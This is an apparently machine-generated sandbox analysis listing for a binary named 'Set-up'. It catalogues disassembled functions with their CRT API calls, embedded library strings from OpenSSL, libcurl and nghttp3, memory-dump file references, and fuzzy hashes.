Function 00E78240 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00E79265,?,00000400,00000000,?), ref: 00E78254
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00E79265,?), ref: 00E78264
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00E79265,?,?,?,?,?,?,00E79265,?,00000400,00000000,?), ref: 00E782C7

Strings

PEM_def_callback, xrefs: 00E782A1
crypto/pem/pem_lib.c, xrefs: 00E782A8
Enter PEM pass phrase:, xrefs: 00E78279, 00E7828C

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
API String ID: 160209724-3271887637
Opcode ID: 5dd17d62c7c6d24a8fc04029bd50195ba21cbd9694965f9a9a1f4fb65fa13c53
Instruction ID: d7da366ca5d56e243935ef0f279f14d0c98863a7aec800f4d1ac52d4b9884c44
Opcode Fuzzy Hash: 5dd17d62c7c6d24a8fc04029bd50195ba21cbd9694965f9a9a1f4fb65fa13c53
Instruction Fuzzy Hash: DD01F5E2B052117BE12175657C86FAB3ACCDBA5B65F04403AFE44A21C2E9509C0551F2

Function 00D28920 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00D2895D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00D28991
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00D2899A
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00D289AB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00D289B4
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00D289B9

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_fileno_writeabortfreemalloc
String ID:
API String ID: 1064163434-0
Opcode ID: eac37b74e3b4ff3d4e3aaf1cf760bd5ecc465001ffc576a18ed692ec35139852
Instruction ID: fc0305ef7851fb7c2ab38a94708979b08c082e5e6cd73726961d153433135e42
Opcode Fuzzy Hash: eac37b74e3b4ff3d4e3aaf1cf760bd5ecc465001ffc576a18ed692ec35139852
Instruction Fuzzy Hash: 6911A5B480A7119FD340AF2AD14462EFBE8FF98745F41881EE9C483341EB7498409FA3

Function 00CE45C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00CB5B6B,00000017,?,?), ref: 00CE4612
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00CE4660

Strings

0123456789abcdef, xrefs: 00CE465B, 00CE466C
0123456789ABCDEF, xrefs: 00CE4683, 00CE4694

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errnomemchr
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 4119152314-885041942
Opcode ID: ef654e891ff7d64514f36f0b9174c81a8aeacffbf7c74f6a9dda74f4281e8575
Instruction ID: f6c1819a2132ae77e585a22ef31d5fafe299b994d7987c893462c2dfefff7e26
Opcode Fuzzy Hash: ef654e891ff7d64514f36f0b9174c81a8aeacffbf7c74f6a9dda74f4281e8575
Instruction Fuzzy Hash: 5E91E571A083858BD72CDF2AC84026AB7D1AFD6314F198A2DE9E9C7381D7359E85C742

Function 00CD2250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CD225F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CD22CF

Strings

Hostname in DNS cache was stale, zapped, xrefs: 00CD2322
:%u, xrefs: 00CD2290, 00CD2363
Hostname in DNS cache does not have needed family, zapped, xrefs: 00CD23EF, 00CD23FE

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
API String ID: 3014104814-1335658360
Opcode ID: 2d4cfe489dd0dafd1284f1bd0d7a201c772e3263e902015c563ed124e0922e99
Instruction ID: 91d0a15f458c18fb93263329f88c4395c3c560efbb27efc57f850523f0c99365
Opcode Fuzzy Hash: 2d4cfe489dd0dafd1284f1bd0d7a201c772e3263e902015c563ed124e0922e99
Instruction Fuzzy Hash: B6414971A003045BD7249A24DC85B7BB3D9EF94318F08853EEFAA87382E635ED45D751

Function 00D306F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,00D30307,?), ref: 00D307AE
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D307C3

Strings

nghttp3_qpack.c, xrefs: 00D307A4, 00D307B9
ctx->next_absidx > absidx, xrefs: 00D307A9
ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 00D307BE

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
API String ID: 1222420520-241347991
Opcode ID: 369ade3b67b000c1a85c5de3be7b52c2b17bf0362b26c1ddd35e22faef4f04b6
Instruction ID: 1b2da80fcfef8548cb19b973bf77e129898da5a59dc6e0d877ff2d17162b5f90
Opcode Fuzzy Hash: 369ade3b67b000c1a85c5de3be7b52c2b17bf0362b26c1ddd35e22faef4f04b6
Instruction Fuzzy Hash: B931C7B57007105FD310EA29EC91E2B77D9FF99718F05852CF94587242E631B85587F1

Function 01004610 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00C95FB6,?), ref: 01004645
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 01004698
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,012FF8F8), ref: 01004744
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 01004762

Strings

../list/public_suffix_list.dat, xrefs: 01004693, 010046B9, 010046F5

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _stat64$fclosefopen
String ID: ../list/public_suffix_list.dat
API String ID: 1085753941-141370353
Opcode ID: 2cbeecc3ab04d3af509da740e8ea6f704e0fc940c47c922b941315326de3b4f2
Instruction ID: 1b31e47cc5d42d6862cb8c67d2cccd88f53c07728b710c6c036f0a5984fa7e81
Opcode Fuzzy Hash: 2cbeecc3ab04d3af509da740e8ea6f704e0fc940c47c922b941315326de3b4f2
Instruction Fuzzy Hash: FC417EB29083419BE701CF18D98075ABBE9BB85744F15493DEAC8D7390E770E948CB97

Function 00D2E990 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ksl_it_get(&it) == stream,nghttp3_qpack.c,000008ED,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00D2EF0E,?), ref: 00D2EA23
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!nghttp3_ksl_it_end(&it),nghttp3_qpack.c,000008EC,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00D2EF0E,?), ref: 00D2EA38

Strings

nghttp3_ksl_it_get(&it) == stream, xrefs: 00D2EA1E
nghttp3_qpack.c, xrefs: 00D2EA19, 00D2EA2E
!nghttp3_ksl_it_end(&it), xrefs: 00D2EA33

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: !nghttp3_ksl_it_end(&it)$nghttp3_ksl_it_get(&it) == stream$nghttp3_qpack.c
API String ID: 1222420520-1964160224
Opcode ID: 190e780b71201f2d3a3340dac768ba6654de6bd6fadb6677d9d7a741e8e891d5
Instruction ID: 597533590a0103a5cb8c6f4aad9c52afb22e1b15befdd64b3160fd1cc90cc5e9
Opcode Fuzzy Hash: 190e780b71201f2d3a3340dac768ba6654de6bd6fadb6677d9d7a741e8e891d5
Instruction Fuzzy Hash: A731BF72804305AFD710DE18EC85E9BB7BCFFA5758F048519F8985B242E730A984CBA2

Function 00CF2680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CF2771

Strings

Connection time-out, xrefs: 00CF26CD
set timeouts for state %d; Total % lld, retry %d maxtry %d, xrefs: 00CF2761
netascii, xrefs: 00CF2680
gfff, xrefs: 00CF26EE

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
API String ID: 1670930206-2395985473
Opcode ID: 99779fe48b628a8d8f39e1db604035bfb18ac38b1c611d18bcfecc135888926c
Instruction ID: 8556a88fc7ae252f73ee6bca7679bbcb3cef8a66005d102e569dee765e70ab51
Opcode Fuzzy Hash: 99779fe48b628a8d8f39e1db604035bfb18ac38b1c611d18bcfecc135888926c
Instruction Fuzzy Hash: AD213EB1B007045FE768AA29EC05F7779DAEBC4304F18853DF549C72D2F571D9009662

Function 00D26010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 00D26119
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 00D2612E

Strings

veccnt > 0, xrefs: 00D26114
0 == offset, xrefs: 00D26129
nghttp3_stream.c, xrefs: 00D2610F, 00D26124

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
API String ID: 1222420520-3888743547
Opcode ID: ce80871b69736a675a1c480d0577e8af064ed993dea47d4e2342811420c91c9e
Instruction ID: 2cec62be27f398eabe8903ca3e2bb90fb65711642a629164309e7b880a49f5da
Opcode Fuzzy Hash: ce80871b69736a675a1c480d0577e8af064ed993dea47d4e2342811420c91c9e
Instruction Fuzzy Hash: A33136715043108FC704EF19E885A6AB7E4FFA831CF0986ACE98957211E632FD41CBA1

Function 00D287E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,00D24D5A,00000000,?,000001F0), ref: 00D28861
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 00D28873

Strings

n <= balloc->blklen, xrefs: 00D2885C
nghttp3_balloc.c, xrefs: 00D28857, 00D28869
((uintptr_t)balloc->buf.last & 0xfu) == 0, xrefs: 00D2886E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
API String ID: 1222420520-3025919285
Opcode ID: 5002939f44379e8797e9c109548be74bd311d63c49fdf64d6faad7b036f7179c
Instruction ID: 2f0080aa9711ecb40226af2132eecef1153efd46f97e37ff50ab0558c7cd189c
Opcode Fuzzy Hash: 5002939f44379e8797e9c109548be74bd311d63c49fdf64d6faad7b036f7179c
Instruction Fuzzy Hash: C911E5B6A01622ABD600CE29FC81915F3A8FF61739B084628F814D3282DB30E821D7F5

Function 00C84810 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 484COMMON

Download Yara Rule

Strings

application/octet-stream, xrefs: 00C84DE3
formdata.c, xrefs: 00C8481F, 00C84C8D, 00C84DEB, 00C84F36, 00C84FF3, 00C85081, 00C850AB, 00C850E6, 00C85116, 00C85161, 00C8518B, 00C851C6, 00C851F6

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: application/octet-stream$formdata.c
API String ID: 0-1216067158
Opcode ID: a744dca3afa8dbbb1b2cb048d82bf2a73439c5268a92e64c14a74b1e048b57eb
Instruction ID: 56319604d6cf4516557837258c2fcfe90661b6ae50a3110993026e0cf98be02a
Opcode Fuzzy Hash: a744dca3afa8dbbb1b2cb048d82bf2a73439c5268a92e64c14a74b1e048b57eb
Instruction Fuzzy Hash: 8102D770A04B418FE729EF15C844727BBE17F5030CF28482DD89A87792E7B6E985C749

Function 00F246B0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00F246DD

Strings

maxsize=%ld, xrefs: 00F24899
